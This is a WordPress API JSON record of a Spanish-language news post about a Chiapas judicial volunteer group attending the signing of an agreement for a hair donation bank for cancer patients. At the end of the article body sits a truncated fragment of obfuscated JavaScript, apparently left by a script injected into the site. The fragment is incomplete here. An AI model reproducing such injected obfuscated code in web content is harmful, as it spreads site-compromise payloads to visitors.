{"id":10745,"date":"2023-06-26T04:54:36","date_gmt":"2023-06-26T04:54:36","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10745"},"modified":"2023-06-26T04:54:37","modified_gmt":"2023-06-26T04:54:37","slug":"participa-voluntariado-del-poder-judicial-en-la-firma-de-convenio-del-primer-banco-de-cabello","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10745","title":{"rendered":"Participa Voluntariado del Poder Judicial en la Firma de Convenio del Primer Banco de Cabello"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"666\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/IMG-20230625-WA0002.jpg\" alt=\"\" class=\"wp-image-10746\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/IMG-20230625-WA0002.jpg 1000w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/IMG-20230625-WA0002-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/IMG-20230625-WA0002-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/IMG-20230625-WA0002-310x205.jpg 310w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<p>El Voluntariado del Poder Judicial del Estado, que preside la presidenta Josefa Sangeado Camacho, asisti\u00f3 a la Firma de Convenio de Colaboraci\u00f3n para Establecer el Primer Banco de Donaci\u00f3n de Cabello del Voluntariado de Coraz\u00f3n, del Sistema DIF Chiapas y el Voluntariado CECyTE-TBC Chiapas de Coraz\u00f3n.<\/p>\n\n\n\n<p>Este acto protocolario tuvo como sede la Sala de Medios, Maestra Carmen V\u00e1zquez Hern\u00e1ndez del Domo CECyTE, donde, en un gesto colaboraci\u00f3n interinstitucional, firmaron los acuerdos para hacer realidad el Proyecto Banco de Donaci\u00f3n de Cabello, con la finalidad de beneficiar a las personas que estan recibiendo un tratamiento contra el C\u00e1ncer, y fortalecer las acciones que se implementan en la Campa\u00f1a Permanente Dona Tu Cabello de Coraz\u00f3n.<\/p>\n\n\n\n<p>En este evento las y los funcionarios presentes, hicieron un recorrido por los diferentes stands de donaciones como: Donaci\u00f3n de Sangre, est\u00e9tica m\u00f3vil, entrega del Buz\u00f3n Banco de Cabello, y stand de Tapitas; donde adem\u00e1s, se realiz\u00f3 la entrega de una Peluca Oncol\u00f3gica a la se\u00f1ora Raymundo Velasco Flores y la donaci\u00f3n de una recolecci\u00f3n de coletas de parte del Voluntariado del CECyTE-TBC Chiapas de Coraz\u00f3n.<\/p>\n\n\n\n<p>En representaci\u00f3n de la presidenta del Voluntariado del Poder Judicial, Josefa Sangeado; asisti\u00f3 la coordinadora Brenda Camacho Pedrero, quien acuerp\u00f3 este evento al formar parte de la Red de Voluntariados de Coraz\u00f3n del Sistema DIF, reafirmando el compromiso de continuar replicando las campa\u00f1as permanentes y las acciones que se realizan en el Poder Judicial de Chiapas, en beneficio de la poblaci\u00f3n que m\u00e1s lo necesita.<\/p>\n\n\n\n<p>Asistieron como miembros del presidium, la coordinadora del Voluntariado de Coraz\u00f3n del Sistema DIF Chiapas, Adriana Margarita L\u00f3pez S\u00e1nchez; la presidenta del Voluntariado del CECyTE -TBC Chiapas de Coraz\u00f3n, Arely D\u00edaz Vel\u00e1zquez; la presidenta del Voluntariado de la CMIC, Alejandra G\u00f3mez Zuart; la presidenta de la Fundaci\u00f3n Suma y Deja Huella A.C., Lourdes Cervantes Yanez; as\u00ed como el director de general del CECyTE Chiapas y Coordinador Estatal del TBC, Sandro Hern\u00e1ndez Pi\u00f1\u00f3n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>El Voluntariado del Poder Judicial del Estado, que preside la presidenta Josefa Sangeado Camacho, asisti\u00f3 a la Firma de Convenio de Colaboraci\u00f3n para Establecer el Primer Banco de Donaci\u00f3n de Cabello del Voluntariado de Coraz\u00f3n, del Sistema DIF Chiapas y el Voluntariado CECyTE-TBC Chiapas de Coraz\u00f3n. Este acto protocolario tuvo como sede la Sala de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10746,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-10745","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10745","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10745"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10745\/revisions"}],"predecessor-version":[{"id":10747,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10745\/revisions\/10747"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10746"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10745"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10745"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10745"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}